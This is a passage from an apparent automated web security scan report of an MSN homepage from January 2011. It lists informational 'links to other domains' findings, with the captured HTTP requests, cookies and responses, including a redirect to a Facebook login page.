<a href="http://appetiteforlife.redacted/?section=episodes&amp;content=2&amp;source=msn&amp;from=en-us_msnhp&amp;GT1=25052"><img src="http://col.stb.s-msn.com/i/69/38A7E111C7E3A98263F6658E7063D2.jpg" title="Image: Video still of Andrew Zimmern (.. Reveille/Microsoft)" width="75" height="128" alt="Image: Video still of Andrew Zimmern (.. Reveille/Microsoft)" /></a>
...[SNIP]...
<a href="http://g.redacted/AIPRIV/en-us" class="adch"><img src="http://col.stc.s-msn.com/br/sc/i/icons/adchoices_gif.gif" alt="Ad Choice" title="Ad Choice" height="12" width="68" /></a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/home/home">Advertise</a>
...[SNIP]...
<li><a href="https://careers.microsoft.com/">Jobs</a>
...[SNIP]...
<li><a class="opennew" href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...

22.433. http://www.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redacted
Path:   /

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /?euid=AD04D6F8B2FF44629973BD0674351135&userGroup=D1:default&PM=z:1 HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://www.redacted/
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: www.redacted
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; expac=813II6a37_1229:C~41II4a36_0830:WP10_4~271II8B37_0107:C|; stvx=gendermodule:forher

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:46:43 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA24
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 45617
Content-Length: 45617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><body><d
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=January+29&amp;mkt=en-us&amp;FORM=MSNHPT">Saturday, January 29, 2011</a>
...[SNIP]...
<a href="http://www.msnbc.redacted/id/41327694/ns/us_news/?GT1=43001"><img src="http://col.stb.s-msn.com/i/1C/562F924B0BFF0EF9E7EB8EAB7627.jpg" title="Image: Gen. James Cartwright holds a news briefing and update on the Don't Ask Don't Tell repeal implementation at the Pentagon, Friday (.. Chip Somodevilla/Getty Images)" width="206" height="144" alt="Image: Gen. James Cartwright holds a news briefing and update on the Don't Ask Don't Tell repeal implementation at the Pentagon, Friday (.. Chip Somodevilla/Getty Images)" /></a>
...[SNIP]...
<a href="http://cosmiclog.msnbc.redacted/_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches/?GT1=43001"><img src="http://col.stb.s-msn.com/i/C1/EC55D18C76E570E2D9F5B31996EFBC.jpg" title="Image: File photo of King Tutankhamun's golden mask displayed at the Egyptian museum in Cairo (.. Khaled Desouki/AFP/Getty Images)" width="206" height="144" alt="Image: File photo of King Tutankhamun's golden mask displayed at the Egyptian museum in Cairo (.. Khaled Desouki/AFP/Getty Images)" /></a>
...[SNIP]...
<li style="width:206px;" class="last"><a href="http://msn.foxsports.com/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/?GT1=39002"><img src="http://col.stb.s-msn.com/i/F9/5BC51AED48AF6FAE2ADD2AF77F074.jpg" title="Image: File photo of Philadelphia Flyers goalie Michael Leighton looking for the puck after giving up the game-winning goal to Chicago Blackhawks Patrick Kane in overtime of the NHL Stanley Cup hockey finals (.. Matt Slocum/AP)" width="206" height="144" alt="Image: File photo of Philadelphia Flyers goalie Michael Leighton looking for the puck after giving up the game-winning goal to Chicago Blackhawks Patrick Kane in overtime of the NHL Stanley Cup hockey finals (.. Matt Slocum/AP)" /></a><a href="http://msn.foxsports.com/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/?GT1=39002">FBI helps with missing puck</a>
...[SNIP]...
<a href="http://money.msn.com/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx?GT1=33001"><img src="http://col.stb.s-msn.com/i/97/46C217C8DB39C2D6289FA229C0D5BD.jpg" title="Image: Frustrated woman holding a telephone (.. Compassionate Eye Foundation/Chris Newton/OJO Images Ltd/Getty Images)" width="303" height="211" alt="Image: Frustrated woman holding a telephone (.. Compassionate Eye Foundation/Chris Newton/OJO Images Ltd/Getty Images)" /></a>
...[SNIP]...
<a href="http://dating.msn.com/en-us/partner/msn/38028.html?trackingid=526133&amp;bannerid=673612&amp;gc=1&amp;tr=2&amp;keyword=football&amp;gt1=26000"><img src="http://col.stb.s-msn.com/i/62/47BC124184233113131B97F8F8359E.jpg" title="Image: Couple playing football (.. Jamie Grill/Getty Images)" width="293" height="144" alt="Image: Couple playing football (.. Jamie Grill/Getty Images)" /></a>
...[SNIP]...
<li style="width:293px;" class="last"><a href="http://msn.chemistry.com/cp/landing/57269?trackingid=516068&amp;bannerid=2117936&amp;gt1=26000"><img src="http://col.stb.s-msn.com/i/42/40224F9769E8AD5EA8F8A624E74A.jpg" title="Image: Couple in restaurant (.. Commercial Eye/Getty Images)" width="293" height="144" alt="Image: Couple in restaurant (.. Commercial Eye/Getty Images)" /></a><a href="http://msn.chemistry.com/cp/landing/57269?trackingid=516068&amp;bannerid=2117936&amp;gt1=26000">Women: Find a guy who's just like you </a>
...[SNIP]...
<a href="http://editorial.autos.redacted/article.aspx?cp-documentid=1167044&amp;icid=autos_0252&amp;GT1=22017"><img src="http://col.stb.s-msn.com/i/40/6087ED1789141E9E7E7476F7D2A816.jpg" title="Image: 2011 Ford-F150 Harley-Davidson (.. Ford Motor Company)" width="303" height="211" alt="Image: 2011 Ford-F150 Harley-Davidson (.. Ford Motor Company)" /></a>
...[SNIP]...
<a href="http://realestate.redacted/slideshow.aspx?cp-documentid=26575521&amp;GT1=35006"><img src="http://col.stb.s-msn.com/i/2A/D52DA0C2C7D0F37DBB382A8318106A.jpg" title="Image: Raleigh, N.C. (.. Visions of America LLC/Alamy)" width="303" height="211" alt="Image: Raleigh, N.C. (.. Visions of America LLC/Alamy)" /></a>
...[SNIP]...
<a href="http://www.msnbc.redacted/id/21134540/vp/41326711#41326711?from=en-us_msnhp&amp;gt1=43001"><img class="landscape" src="http://col.stb.s-msn.com/i/9F/2177C83925E3767FB9AC282991F22.jpg" title="Image: Video still of Rebecca Williams (.. NBC)" width="303" height="117" alt="Image: Video still of Rebecca Williams (.. NBC)" /></a>
...[SNIP]...
<li class="ter"><a href="http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html?blockID=399825&amp;feedID=3698&amp;gt1=39002">No limits for one-legged wrestler</a>
...[SNIP]...
<li class="ter"><a href="http://lifeinc.todayshow.com/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never?gt1=43001">Americans cheat on taxes? Never</a>
...[SNIP]...
<a href="http://fitbie.msn.com/eat-right/tips/stock-your-refrigerator-weight-loss?gt1=50002"><img class="landscape" src="http://col.stb.s-msn.com/i/6D/94835E23C59DA9988832DB01F.jpg" title="Image: Woman standing in front of refrigerator (.. Gerda Genis/Getty Images)" width="303" height="117" alt="Image: Woman standing in front of refrigerator (.. Gerda Genis/Getty Images)" /></a>
...[SNIP]...
<a href="http://lifestyle.redacted/your-life/your-money-today/video.aspx?vid=44eb5873-9b59-48a2-9bc9-e3a313f766a5"><img class="landscape" src="http://col.stb.s-msn.com/i/A4/C9F6DB1429C482320999B20976453.jpg" title=" Image: Man shredding paper (.. James Darell/Getty Images) " width="128" height="73" alt=" Image: Man shredding paper (.. James Darell/Getty Images) " /></a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/search?q=how+to+make+your+own+laundry+detergent&amp;form=msnhed&amp;GT1=36010"><img class="landscape" src="http://col.stb.s-msn.com/i/25/0E3EF1611A1E83275679938D78B0.jpg" title="Image: Woman with laundry basket (.. Jupiterimages/Getty Images)" width="128" height="73" alt="Image: Woman with laundry basket (.. Jupiterimages/Getty Images)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/search?q=how+to+make+your+own+laundry+detergent&amp;form=msnhed&amp;GT1=36010"><strong>
...[SNIP]...
<p>Bing: Mixing it up <a href="http://www.bing.com/search?q=how+to+make+your+own+laundry+detergent&amp;form=msnhed&amp;GT1=36010">on your own is easy</a>
...[SNIP]...
<a href="http://lifestyle.redacted/your-home/room-design/staticslideshowhb.aspx?cp-documentid=26867784&amp;gt1=32067"><img class="portrait" src="http://col.stb.s-msn.com/i/B7/CA0287F24D531F31B28EDED6FF651.jpg" title="Image: Accent pillows (.. redcover.com/Getty Images)" width="116" height="175" alt="Image: Accent pillows (.. redcover.com/Getty Images)" /></a>
...[SNIP]...
<a href="http://lifestyle.redacted/your-look/makeup-skin-care-hair/staticslideshowessence.aspx?cp-documentid=27338469&amp;gt1=32002"><img class="landscape" src="http://col.stb.s-msn.com/i/79/3D0CF24EE45332AEC818733145573.jpg" title="Image: Woman with curly hair style (Courtesy of Essence) " width="128" height="73" alt="Image: Woman with curly hair style (Courtesy of Essence)" /></a>
...[SNIP]...
<div><a href="http://msn.foxsports.com/collegebasketball/scores"><img class="landscape" src="http://static.foxsports.com/content/fscom/img/2011/01/29/012911-CBK-Louisville-TWICE-AS-NICE-JW-PI_20110129151135131_303_117.JPG" width="303" height="117" alt="Image: Louisville Cardinals (Fred Beckham/AP)" /></a></div><div><a href="http://msn.foxsports.com/collegebasketball/scores">Live: Upsets abound in college hoops</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/golf/story/Farmers-Insurance-Open-Phil-Mickelson-Tiger-Woods-Bill-Haas-012911">How is Tiger Woods doing in 2011 season debut?</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/nba/story/OJ-Mayo-reason-for-suspension-energy-drink-012911">NBA star blames gas station stop for positive test</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/mlb/story/new-york-yankees-president-ted-levine-calls-out-texas-rangers-ceo-chuck-greenberg-012911">Yankees boss to rival: Keep your team 'off welfare'</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/olympics/story/ian-thorpe-reportedly-mounting-comeback-for-2012-olympics-012911">Report: Olympic swimming star making comeback</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/nba/story/Marvin-Willians-Shawne-Williams-suspension-Knicks-Hawks-012911">Suspensions handed down after NBA brawl</a><span class="piped"> | <a href="http://msn.foxsports.com/nba/gallery/new-york-knicks-atlanta-hawks-fight-marvin-williams-shawne-williams-gallery-012911">Pics</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/nba/story/shaq-oneal-kobe-bryant-los-angeles-lakers-boston-celtics-rivalry-intact-012911">Shaq in green adds twist to Lakers-Celtics rematch</a>
...[SNIP]...
<li class="ter"><a href="http://recruiting.scout.com/a.z?s=73&amp;p=9&amp;c=4&amp;pid=88&amp;yr=2011">Where are top college football prospects headed?</a>
...[SNIP]...
<div><a href="http://www.bing.com/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck?q=Weather+Forecast&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&gt;=42007"><img class="landscape" src="http://col.stb.s-msn.com/i/80/2FF81810DDCE8AD3FEECAFC567B1FA.jpg" title="Image: Video still of reporter talking to citizen about snow (.. WMUR Manchester)" width="303" height="117" alt="Image: Video still of reporter talking to citizen about snow (.. WMUR Manchester)" /></a></div><div><a href="http://www.bing.com/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck?q=Weather+Forecast&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&gt;=42007">'Hey, guess what! It's snowing!' </a>
...[SNIP]...
<p>A New Hampshire news crew hits the snowy streets to make sure the locals <a href="http://www.bing.com/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck?q=Weather+Forecast&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&gt;=42007">aren't fooled</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs?rs=glee&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;GT1=42007"><img class="landscape" src="http://col.stb.s-msn.com/i/1F/B5E89286961128824C7AE6885EC.jpg" title="Image: Video still of Chris Colfer as Riff Raff in the 'Rocky Horror Picture Show' episode of 'Glee' (.. 20th Century FOX)" width="128" height="73" alt="Image: Video still of Chris Colfer as Riff Raff in the 'Rocky Horror Picture Show' episode of 'Glee' (.. 20th Century FOX)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs?rs=glee&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;GT1=42007"><strong>
...[SNIP]...
<p>Go <a href="http://www.bing.com/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs?rs=glee&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;GT1=42007">behind the scenes</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo?q=Rhino&amp;rel=msn&amp;from=en-us_msnhp&amp;form=msnrll&amp;gt1=42007"><img class="landscape" src="http://col.stb.s-msn.com/i/6A/5F94C974FCBAE14AFF1F886AE8B.jpg" title="Image: Video still of Rukwa the black rhino eating her birthday cake (.. U-Zoo)" width="128" height="73" alt="Image: Video still of Rukwa the black rhino eating her birthday cake (.. U-Zoo)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo?q=Rhino&amp;rel=msn&amp;from=en-us_msnhp&amp;form=msnrll&amp;gt1=42007"><strong>
...[SNIP]...
<p>There's a <a href="http://www.bing.com/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo?q=Rhino&amp;rel=msn&amp;from=en-us_msnhp&amp;form=msnrll&amp;gt1=42007">treat in store</a>
...[SNIP]...
<div style="float:right;width:116px"><a href="http://www.delish.com/food/recalls-reviews/its-not-bakery-its-digiorno?gt1=47001"><img class="portrait" src="http://col.stb.s-msn.com/i/B5/F9DAF1B9A4431DBA728B9CFFBAAF3.jpg" title="Image: DiGiorno's pizza &amp; cookies combo (Courtesy of Delish)" width="116" height="175" alt="Image: DiGiorno's pizza &amp; cookies combo (Courtesy of Delish)" /></a></div><div style="margin-right:116px; padding-right: 10px;"><a href="http://www.delish.com/food/recalls-reviews/its-not-bakery-its-digiorno?gt1=47001">Pizza &amp; cookie dough: Gross or good?</a>
...[SNIP]...
<p>DiGiorno debuts what is either the <a href="http://www.delish.com/food/recalls-reviews/its-not-bakery-its-digiorno?gt1=47001">tastiest or most tasteless</a>
...[SNIP]...
<a href="http://www.msnbc.redacted/id/41253088/ns/technology_and_science-science?GT1=43001"><img class="landscape" src="http://col.stb.s-msn.com/i/8B/97F3ADB0E857BC24D9E8B13F3984.jpg" title="Image: Boy on fence (.. Charlie Roy/Getty Images)" width="128" height="73" alt="Image: Boy on fence (.. Charlie Roy/Getty Images)" /></a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/search?q=first+Beatles+degree&amp;form=msnhed&amp;GT1=36010"><img class="landscape" src="http://col.stb.s-msn.com/i/56/AE3B1E3A7AE6E076D8253197D1489B.jpg" title="Image: Mary-Lu Zahalan-Kennedy (.. Alan Edwards/Liverpool Hope University/AP)" width="128" height="73" alt="Image: Mary-Lu Zahalan-Kennedy (.. Alan Edwards/Liverpool Hope University/AP)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/search?q=first+Beatles+degree&amp;form=msnhed&amp;GT1=36010"><strong>
...[SNIP]...
<p>A UK university has awarded one woman a <a href="http://www.bing.com/search?q=first+Beatles+degree&amp;form=msnhed&amp;GT1=36010">special degree</a>
...[SNIP]...
<div style="float:left;width:128px"><a href="http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv?form=ETMONA&amp;from=en-us_msnhp"><img class="landscape" src="http://col.stb.s-msn.com/i/FB/39B57119E113EAC72C86F212549.jpg" title="Image: 'Rio' (.. 20th Century Fox)" width="128" height="73" alt="Image: 'Rio' (.. 20th Century Fox)" /></a></div><div style="margin-left:128px; padding-left: 10px"><a href="http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv?form=ETMONA&amp;from=en-us_msnhp"><strong>
...[SNIP]...
<div style="float:left;width:128px"><a href="http://www.theworkbuzz.com/employment-trends/video-interviews/?cobrand=msn&amp;utm_source=MSN&amp;utm_medium=MSNJM&amp;utm_campaign=MSNCareers"><img class="landscape" src="http://col.stb.s-msn.com/i/A6/6401E4B948C6DA838C385E3FAD9FC.jpg" title="Image: Businesswoman on computer screen (.. Bernhard Lang/Getty Images)" width="128" height="73" alt="Image: Businesswoman on computer screen (.. Bernhard Lang/Getty Images)" /></a></div><div style="margin-left:128px; padding-left: 10px"><a href="http://www.theworkbuzz.com/employment-trends/video-interviews/?cobrand=msn&amp;utm_source=MSN&amp;utm_medium=MSNJM&amp;utm_campaign=MSNCareers"><strong>
...[SNIP]...
<p>How <a href="http://www.theworkbuzz.com/employment-trends/video-interviews/?cobrand=msn&amp;utm_source=MSN&amp;utm_medium=MSNJM&amp;utm_campaign=MSNCareers">video is replacing</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/?SiteId=cbmsnjm41951&amp;sc_extcmp=JS_1951_jobmod">Get paid to socially network</a>
...[SNIP]...
<li class="ter"><a href="http://www.theworkbuzz.com/fun-stuff/your-work-soundtrack/#more-6495/?cobrand=msn&amp;utm_source=MSN&amp;utm_medium=MSNJM&amp;utm_campaign=MSNCareers">Your work soundtrack</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/?SiteId=cbmsnjm41302&amp;sc_extcmp=JS_1302_jobmod">Excuse-free time off</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/?SiteId=cbmsnjm41391&amp;sc_extcmp=JS_1391_jobmod">9 questions you should ask your boss</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/?SiteId=cbmsnjm42469&amp;sc_extcmp=JS_2469_jobmod">Job advice that was true 20 years ago</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=job+interview+makeup&amp;form=ap&amp;gt1=36010">Bing: Got an interview? Get makeup tips</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=how+to+live+on+a+tight+budget&amp;form=ap&amp;gt1=36010">Search: How to live on a tight budget</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=how+to+get+the+job+of+your+dreams&amp;form=ap&amp;gt1=36010">Find: How to get your dream job</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&amp;cid=msn1162079&amp;FORM=TRVCON"><img class="landscape" src="http://col.stb.s-msn.com/i/A8/EAAC5AEEA4675FAFFCE4F81A2F97C.jpg" title="Image: Boats in harbor, Bandon, Ore. (Courtesy Wood Sabolt)" width="128" height="73" alt="Image: Boats in harbor, Bandon, Ore. (Courtesy Wood Sabolt)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&amp;cid=msn1162079&amp;FORM=TRVCON"><strong>
...[SNIP]...
<p>Bigger isn't always better in these <a href="http://www.bing.com/travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&amp;cid=msn1162079&amp;FORM=TRVCON">fun, hip burgs</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Hawaiian+Islands%3a+Best+for+Gorgeous+Beaches&amp;cid=msntab1162226&amp;FORM=TRVCON">Which Hawaiian Island is right for you?</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=World's+Coolest+Hot+Springs%3a+The+Blue+Lagoon%2c+Iceland&amp;cid=msntab1174865&amp;FORM=TRVCON">Coolest hot springs around the globe</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Underground+Attractions%3a+Cu+Chi+Tunnels%2c+Vietnam&amp;cid=msntab1173638&amp;FORM=TRVCON">15 unusual underground attractions</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=37+Secrets+of+the+Caribbean&amp;cid=msntab1172106&amp;Form=TRVCON">37 steals &amp; deals for the Caribbean</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/deals/cheap-flights-to-the-caribbean.do?cid=msn_tab&amp;form=trvcon">Cheap flights to the Caribbean</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751?&amp;qpvt=hawaii+hotels&amp;cid=msn_tab&amp;form=trvcon">Hotel deals in Honolulu</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/deals/last-minute-flight-deals.do?cid=msn_tab&amp;form=trvcon">Last-minute flights on the cheap</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/hotels?cid=msn_tab&amp;form=trvcon">Find the perfect hotel</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/maps/explore/?org=aj&amp;FORM=Z9LH9#">Bing Maps: Where do you want to go next?</a>
...[SNIP]...
<div style="width: 75px;"><a href="http://www.bing.com/shopping/content/search?q=Cocktail+Dresses%3a+Silk+Organza+Strapless+Dress&amp;form=MSHINA&amp;publ=MSNHPSPOT&amp;crea=TEXT_MSHINA_CORE_image_jl0125_1x1&amp;gt1=36010"><img src="http://col.stb.s-msn.com/i/9A/ADE8D0D0F6E1E0938CFDB1EA5D949E.jpg" title="Image: Model wearing cap sleeve dress (Courtesy of Nordstrom) " width="75" height="128" alt="Image: Model wearing cap sleeve dress (Courtesy of Nordstrom) " /></a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/shopping/content/search?q=Cocktail+Dresses%3a+Silk+Organza+Strapless+Dress&amp;form=MSHINA&amp;publ=MSNHPSPOT&amp;crea=TEXT_MSHINA_CORE_image_jl0125_1x1&amp;gt1=36010">Flirty dresses for Valentine's Day </a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping/content/search?q=NFL+Jerseys%3a+Brett+Favre&amp;form=MSHINA&amp;publ=MSNHPSPOT&amp;crea=TEXT_MSHINA_CORE_Bullet2_jl0125_1x1&amp;gt1=36010">Popular NFL players' jerseys </a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping/content/search?q=Cupcake+Stand&amp;form=MSHINA&amp;publ=MSNHPSPOT&amp;crea=TEXT_MSHINA_CORE_Bullet3_jl0125_1x1&amp;gt1=36010">Bake cute, tasty cupcakes at home </a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping/content/search?q=Weight+Loss%3a+Glaxo+Smith+Kline+Alli&amp;form=MSHINA&amp;publ=MSNHPSPOT&amp;crea=TEXT_MSHINA_CORE_Bullet4_jl0125_1x1&amp;gt1=36010">Diets that take weight off </a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/shopping/content/search?q=Hair+Loss+Remedy%3a+Spectral+DNC+Topical+Hair+Loss+Treatment&amp;form=MSHINA&amp;publ=MSNHPSPOT&amp;crea=TEXT_MSHINA_CORE_Bullet5_jl0125_1x1&amp;gt1=36010">Which hair loss remedies really work? </a>
...[SNIP]...
<a href="http://g.redacted/AIPRIV/en-us" class="adch"><img src="http://col.stc.s-msn.com/br/sc/i/icons/adchoices_gif.gif" alt="Ad Choice" title="Ad Choice" height="12" width="68" /></a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/home/home">Advertise</a>
...[SNIP]...
<li><a href="https://careers.microsoft.com/">Jobs</a>
...[SNIP]...
<li><a class="opennew" href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...

22.434. http://www.redacted/scp/AuthServiceFacebook.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redacted
Path:   /scp/AuthServiceFacebook.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /scp/AuthServiceFacebook.aspx?redirectTo=0&mkt=en-us&format=Homepage HTTP/1.1
Host: www.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; CULTURE=EN-US; CC=US; MUID=AD04D6F8B2FF44629973BD0674351135; Sample=63; mh=MSFT; expac=813II6a37_1229:C~41II4a36_0830:WP10_4~271II8B37_0107:C|; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; stvx=gendermodule:forher; MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 23:53:36 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA29
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Location: http://en-us.facebook.com/login.php?api_key=8f8fa7ab966b3be82807212858019588&display=popup&extern=1&fbconnect=true&return_session=1&req_perms=read_stream,user_status&v=1.0&next=http%3a%2f%2fwww.redacted%2fscp%2fAuthServiceFacebook.aspx%3fredirectTo%3d8%26mkt%3den-US%26format%3dHomepage%26unifiedSignIn%3dFalse%26SPSAdapterAlias%3d%26WLProductID%3d&cancel_url=http%3a%2f%2fwww.msn.com%2fscp%2fAuthServiceFacebook.aspx%3fredirectTo%3d7%26mkt%3den-US%26format%3dHomepage%26unifiedSignIn%3dFalse%26SPSAdapterAlias%3d%26WLProductID%3d
Cache-Control: no-cache
Cache-Control: no-store, must-revalidate, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 678

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://en-us.facebook.com/login.php?api_key=8f8fa7ab966b3be82807212858019588&amp;display=popup&amp;extern=1&amp;fbconnect=true&amp;return_session=1&amp;req_perms=read_stream,user_status&amp;v=1.0&amp;next=http%3a%2f%2fwww.redacted%2fscp%2fAuthServiceFacebook.aspx%3fredirectTo%3d8%26mkt%3den-US%26format%3dHomepage%26unifiedSignIn%3dFalse%26SPSAdapterAlias%3d%26WLProductID%3d&amp;cancel_url=http%3a%2f%2fwww.redacted%2fscp%2fAuthServiceFacebook.aspx%3fredirectTo%3d7%26mkt%3den-US%26format%3dHomepage%26unifiedSignIn%3dFalse%26SPSAdapterAlias%3d%26WLProductID%3d">here</a>
...[SNIP]...

22.435. http://www.redacted/scp/AuthServiceFacebookLogOff.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redacted
Path:   /scp/AuthServiceFacebookLogOff.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /scp/AuthServiceFacebookLogOff.aspx?redirectTo=0&mkt=en-us&format=Homepage HTTP/1.1
Host: www.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
